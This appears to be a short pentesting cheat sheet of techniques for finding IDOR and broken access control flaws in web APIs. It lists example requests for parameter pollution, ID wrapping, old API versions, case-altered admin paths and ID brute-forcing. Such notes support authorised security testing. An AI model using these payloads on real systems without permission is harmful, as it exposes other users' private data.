IDOR
Basically try to screw with evertything.
Burp filter
(?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)
Add parameters into the endpoints
GET /api_v1/messages --> 401
GET /api_v1/messages?user_id=victim_uuid --> 200
HTTP Parameter pollution
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK
GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
JSON Parameter Pollution:
POST /api/get_profile
Content-Type: application/json
{“user_id”:<legit_id>,”user_id”:<victim’s_id>}
Add .json to the endpoint, if it is built in Ruby!
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
Test on outdated API Versions
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
Wrap the ID with an array.
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
Wrap the ID with a JSON object:
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
Missing Function Level Access Control
GET /admin/profile -> 401
GET /ADMIN/profile -> 200
- Try to send a wildcard(*) instead of an ID.
- If it is a number id, be sure to test through a large amount of numbers, instead of just guessing
- If endpoint has a name like /api/users/myinfo, check for /api/admin/myinfo
- Replace request method with GET/POST/PUT/DELETE/PATCH
- Check if Referer header is used to validate requests
- Swap GUID with numeric ID or email
- Try obvious GUIDs such as 00000-0000-0000-00000 or 11111-11…
GUID
GUID v1 can be easy exploitable